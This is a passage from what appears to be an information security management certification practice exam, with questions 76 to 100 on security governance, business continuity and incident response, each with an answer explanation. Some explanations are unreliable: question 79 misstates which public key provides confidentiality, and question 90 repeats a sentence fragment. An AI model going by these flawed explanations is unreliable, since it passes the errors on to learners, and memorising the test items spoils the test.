Cardholder data should be encrypted using strong encryption techniques. Hardening would be secondary in importance, while nonrepudiation would not be as relevant. Authentication of the point-of-sale (POS) terminal is a previous step to acquiring the card information.
-----
76. Which of the following practices is BEST to remove system access for contractors and other temporary users when it is no longer required?
a. Log all account usage and send it to their manager
b. Establish predetermined automatic expiration dates
c. Require managers to e-mail security when the user leaves
d. Ensure each individual has signed a security acknowledgement
Predetermined expiration dates are the most effective means of removing systems access for temporary users. Reliance on managers to promptly send in termination notices cannot always be counted on, while requiring each individual to sign a security acknowledgement would have little effect in this case.
-----
77. Which of the following is MOST important for a successful information security program?
a. Adequate training on emerging security technologies
b. Open communication with process owners
c. Adequate policies, standards and procedures
d. Executive management commitment
Sufficient executive management support is the most important factor for the success of an information security program. Open communication, adequate training, and good policies and procedures, while important, are not as important as support from top management; they will not ensure success if senior management support is not present.
-----
78. When considering the value of assets, which of the following would give the information security manager the MOST objective basis for measurement of value delivery in information security governance?
a. Number of controls
b. Cost of achieving control objectives
c. Effectiveness of controls
d. Test results of controls
Comparison of cost of achievement of control objectives and corresponding value of assets sought to be protected would provide a sound basis for the information security manager to measure value delivery. Number of controls has no correlation with the value of assets unless the effectiveness of the controls and their cost are also evaluated. Effectiveness of controls has no correlation with the value of assets unless their costs are also evaluated. Test results of controls have no correlation with the value of assets unless the effectiveness of the controls and their cost are also evaluated.
-----
79. Which of the following, using public key cryptography, ensures authentication, confidentiality and nonrepudiation of a message?
a. Encrypting first by receiver's private key and second by sender's public key
b. Encrypting first by sender's private key and second by receiver's public key
c. Encrypting first by sender's private key and second decrypting by sender's public key
d. Encrypting first by sender's public key and second by receiver's private key
Encrypting by the sender's private key ensures authentication. By being able to decrypt with the sender's public key, the receiver would know that the message is sent by the sender only and the sender cannot deny/repudiate the message. By encrypting with the sender's public key secondly, only the sender will be able to decrypt the message and confidentiality is assured. The receiver's private key is private to the receiver and the sender cannot have it for encryption. Similarly, the receiver will not have the private key of the sender to decrypt the second-level encryption. In the case of encrypting first by the sender's private key and, second, decrypting by the sender's public key, confidentiality is not ensured since the message can be decrypted by anyone using the sender's public key. The receiver's private key would not be available to the sender for second-level encryption. Similarly, the sender's private key would not be available to the receiver for decrypting the message.
-----
80. A test plan to validate the security controls of a new system should be developed during which phase of the project?
a. Testing
b. Initiation
c. Design
d. Development
In the design phase, security checkpoints are defined and a test plan is developed. The testing phase is too late since the system has already been developed and is in production testing. In the initiation phase, the basic security objective of the project is acknowledged. Development is the coding phase and is too late to consider test plans.
-----
81. The MOST effective way to ensure that outsourced service providers comply with the organization's information security policy would be:
a. service level monitoring
b. penetration testing
c. periodically auditing
d. security awareness training
Regular audit exercise can spot any gap in the information security compliance. Service level monitoring can only pinpoint operational issues in the organization's operational environment. Penetration testing can identify security vulnerability but cannot ensure information compliance. Training can increase users' awareness on the information security policy, but is not more effective than auditing.
-----
82. In order to protect a network against unauthorized external connections to corporate systems, the information security manager should BEST implement:
a. a strong authentication
b. IP antispoofing filtering
c. network encryption protocol
d. access list of trusted devices
Strong authentication will provide adequate assurance on the identity of the users, while IP antispoofing is aimed at the device rather than the user. Encryption protocol ensures data confidentiality and authenticity while access lists of trusted devices are easily exploited by spoofed identity of the clients.
-----
Domain 4 - Information Security Incident Management (18%)
83. Which of the following terms and conditions represent a significant deficiency if included in a commercial hot site contract?
a. A hot site facility will be shared in multiple disaster declarations.
b. All equipment is provided "at time of disaster, not on floor".
c. The facility is subject to a "first-come, first-served" policy
d. Equipment may be substituted with equivalent model
Equipment provided "at time of disaster (ATOD), not on floor" means that the equipment is not available but will be acquired by the commercial hot site provider on a best effort basis. This leaves the customer at the mercy of the marketplace. If equipment is not immediately available, the recovery will be delayed. Many commercial providers do require sharing facilities in cases where there are multiple simultaneous declarations, and that priority may be established on a first-come, first-served basis. It is also common for the provider to substitute equivalent or better equipment, as they are frequently upgrading and changing equipment.
-----
84. Which of the following should be performed FIRST in the aftermath of a denial-of-service attack?
a. Restore servers from backup media stored offsite.
b. Conduct an assessment to determine system status
c. Perform an impact analysis of the outage.
d. Isolate the screened subnet.
An assessment should be conducted to determine whether any permanent damage occurred and the overall system status. It is not necessary at this point to rebuild any servers. An impact analysis of the outage or isolating the demilitarized zone (DMZ) or screen subnet will not provide any immediate benefit.
-----
85. Which of the following is the MOST important element to ensure the successful recovery of a business during a disaster?
a. Detailed technical recovery plans are maintained offsite.
b. Network redundancy is maintained through separate providers.
c. Hot site equipment needs are recertified on a regular basis
d. Appropriate declaration criteria have been established.
In a major disaster, staff can be injured or can be prevented from traveling to the hot site, so technical skills and business knowledge can be lost. It is therefore critical to maintain an updated copy of the detailed recovery plan at an offsite location. Continuity of the business requires adequate network redundancy, hot site infrastructure that is certified as compatible and clear criteria for declaring a disaster. Ideally, the business continuity program addresses all of these satisfactorily. However, in a disaster situation, where all these elements are present, but without the detailed technical plan, business recovery will be seriously impaired.
-----
86. The business continuity policy should contain which of the following?
a. Emergency call trees.
b. Recovery criteria
c. Business impact assessment (BIA)
d. Critical backups inventory
Recovery criteria, indicating the circumstances under which specific actions are undertaken, should be contained within a business continuity policy. Telephone trees, business impact assessments (BIAs) and listings of critical backup files are too detailed to include in a policy document.
-----
87. The PRIMARY purpose of installing an intrusion detection system (IDS) is to identify:
a. weaknesses in network security.
b. patterns of suspicious access.
c. how an attack was launched on the network.
d. potential attacks on the internal network.
The most important function of an intrusion detection system (IDS) is to identify potential attacks on the network. Identifying how the attack was launched is secondary. It is not designed specifically to identify weaknesses in network security or to identify patterns of suspicious logon attempts.
-----
88. Which of the following would represent a violation of the chain of custody when a backup tape has been identified as evidence in a fraud investigation? the tape was:
a. removed into the custody of law enforcement investigators.
b. kept in the tape library pending further analysis.
c. sealed in a signed envelope and locked in a safe under dual control.
d. handed over to authorized independent investigators.
Since a number of individuals would have access to the tape library, and could have accessed and tampered with the tape, the chain of custody could not be verified. All other choices provide clear indication of who was in custody of the tape at all times.
-----
89. when properly tested, which of the following would MOST effectively support an information security manager in handling a security breach?
a. Business continuity plan
b. Disaster recovery plan
c. Incident response plan
d. Vulnerability management plan
An incident response plan documents the step-by-step process to follow, as well as the related roles and responsibilities pertaining to all parties involved in responding to an information security breach. A business continuity plan or disaster recovery plan would be triggered during the execution of the incident response plan in the case of a breach impacting the business continuity. A vulnerability management plan is a procedure to address technical vulnerabilities and mitigate the risk through configuration changes (patch management).
-----
90. Isolation and containment measures for a compromised computer have been taken and information security management is now investigating. What is the MOST appropriate next step?
a. Run a forensics tool on the machine to gather evidence.
b. Reboot the machine to break remote connections.
c. Make a copy of the whole system's memory.
d. Document current connections and open Transmission Control Protocol/User Datagram Protocol (TCP/UDP) ports.
When investigating a security breach, it is important to preserve all traces of evidence left by the invader. For this reason, it is imperative to preserve the memory contents of the machine in order to analyze them later. The machine in order to analyze them later. The correct answer is choice C because a copy of the whole system's memory is obtained for future analysis by running the appropriate tools. This is also important from a legal perspective since an attorney may suggest that the system was changed during the conduct of the investigation. Running a computer forensics tool in the compromised machine will cause the creation of at least one process that may overwrite evidence. Rebooting the machine will delete the contents of the memory, erasing potential evidence. Collecting information about current connections and open Transmission Control Protocol/User Datagram Protocol (TCP/UDP) ports is correct, but doing so by using tools may also erase memory contents.
-----
91. The recovery point objective (RPO) requires which of the following?
a. Disaster declaration
b. Before-image restoration
c. System restoration
d. After-image processing
The recovery point objective (RPO) is the point in the processing flow at which system recovery should occur. This is the predetermined state of the application processing and data used to restore the system and to continue the processing flow. Disaster declaration is independent of this processing checkpoint. Restoration of the system can occur at a later date, as does the return to normal, after-image processing.
-----
92. Who would be in the BEST position to determine the recovery point objective (RPO) for business applications?
a. Business continuity coordinator
b. Chief operations officer (COO)
c. Information security manager
d. Internal audit
the recovery point objective (RPO) is the processing checkpoint to which systems are recovered. In addition to data owners, the chief operations officer (COO) is the most knowledgeable person to make this decision. It would be inappropriate for the information security manager or an internal audit to determine the RPO because they are not directly responsible for the data or the operation.
-----
93. When the computer incident response team (CIRT) finds clear evidence that a hacker has penetrated the corporate network and modified customer information, an information security manager should FIRST notify:
a. the information security steering committee.
b. customers who may be impacted.
c. data owners who may be impacted.
d. regulatory agencies overseeing privacy.
The data owners should be notified first so they can take steps to determine the extent of the damage and coordinate a plan for corrective action with the computer incident response team. Other parties will be notified later as required by corporate policy and regulatory requirements.
-----
94. The systems administrator did not immediately notify the security officer about a malicious attack. An information security manager could prevent this situation by:
a. periodically testing the incident response plans.
b. regularly testing the intrusion detection system (IDS)
c. establishing mandatory training of all personnel.
d. periodically reviewing incident response procedures.
Security incident response plans should be tested to find any deficiencies and improve existing processes. Testing the intrusion detection system (IDS) is a good practice but would not have prevented this situation. All personnel need to go through formal training to ensure that they understand the process, tools and methodology involved in handling security incidents. However, testing of the actual plans is more effective in ensuring the process works as intended. Reviewing the response procedures is not enough; the security response plan needs to be tested on a regular basis.
-----
95. Which of the following would a security manager establish to determine the target for restoration of normal processing?
a. Recovery time objective (RTO)
b. Maximum tolerable outage (MTO)
c. Recovery point objectives (RPOs)
d. Services delivery objectives (SDOs)
Recovery time objective (RTO) is the length of time from the moment of an interruption until the time the process must be functioning at a service level sufficient to limit financial and operational impacts to an acceptable level. Maximum tolerable outage (MTO) is the maximum time for which an organization can operate in a reduced mode. Recovery point objectives (RPOs) relate to the age of the data required for recovery. Services delivery objectives (SDOs) are the levels of service required in reduced mode.
-----
96. Which of the following should be the PRIMARY basis for making a decision to establish an alternate site for disaster recovery?
a. A business impact analysis (BIA), which identifies the requirements for continuous availability of critical business processes.
b. Adequate distance between the primary site and the alternate site so that the same disaster does not simultaneously impact both sites.
c. A benchmarking analysis of similarly situated enterprises in the same geographic region to demonstrate due diligence.
d. Differences between the regulatory requirements applicable at the primary site and those at the alternate site.
The BIA will help determine the recovery time objective (RTO) and recovery point objective (RPO) for the enterprise. This information will drive the decision on the appropriate level of protection for its assets. Natural disasters and regulatory requirements are just two of many factors that an enterprise must consider when it decides whether to pursue an alternate site for disaster recovery. While a benchmark could provide useful information, the decision should be based on a BIA, which considers factors specific to the enterprise.
-----
97. During a business continuity plan (BCP) test, one department discovered that its new software application was not going to be restored soon enough to meet the needs of the business. This situation can be avoided in the future by:
a. conducting a periodic and event-dirven business impact analysis (BIA) to determine the needs of the business during a recovery.
b. assigning new applications a higher degree of importance and scheduling them for recovery first.
c. developing a help-desk ticket process that allows departments to request recovery of software during a disaster.
d. conducting a thorough risk assessment prior to purchasing the software.
A periodic BIA can help compensate for changes in the needs of the business for recovery during a disaster. Choice B is an incorrect assumption regarding the automatic importance of a new program. Choice C is not an appropriate recovery procedure because it allows individual business units to make unilateral decisions without consideration of broader implications. The risk assessment may not include the BIA.
-----
98. The main mail server of a financial institution has been compromised at the superuser level; the only way to ensure the system is secure would be to:
a. change the root password of the system.
b. implement multifactor authentication.
c. rebuild the system from the original installation medium.
d. disconnect the mail server from the network.
Rebuilding the system from the original installation medium is the only way to ensure all security vulnerabilities and potential stealth malicious programs have been destroyed. Changing the root password of the system does not ensure that integrity of the mail server. Implementing multifactor authentication is an aftermeasure and does not clear existing security threats. Disconnecting the mail server from the network is an initial step, but does not guarantee security.
-----
99. Which of the following would present the GREATEST risk to information security?
a. Virus signature files updates are applied to all server every day.
b. Security access logs are reviewed within five business days.
c. Critical patches are applied within 24 hours of their release
d. Security incidents are investigated within five business days
Security incidents are configured to capture system events that are important from the security perspective; they include incidents also captured in the security access logs and other monitoring tools. Although, in some instances, they could wait for a few days before they are researched, from the options given this would have the greatest risk to security. Most often, they should be analyzed as soon as possible. Virus signatures should be updated as often as they become available by the vendor, while critical patches should be installed as soon as they are reviewed and tested, which could occur in 24 hours.
-----
100. Which of the following is the MOST important area of focus when examining potential security compromise of a new wireless network?
a. Signal strength
b. Number of administrators
c. Bandwidth
d. Encryption strength
The number of individuals with access to the network configuration presents a security risk. Encryption strength is an area where wireless networks tend to fall short; however, the potential to compromise the entire network is higher when an inappropriate number of people can alter the configuration. Signal strength and network bandwidth are secondary issues.
-----
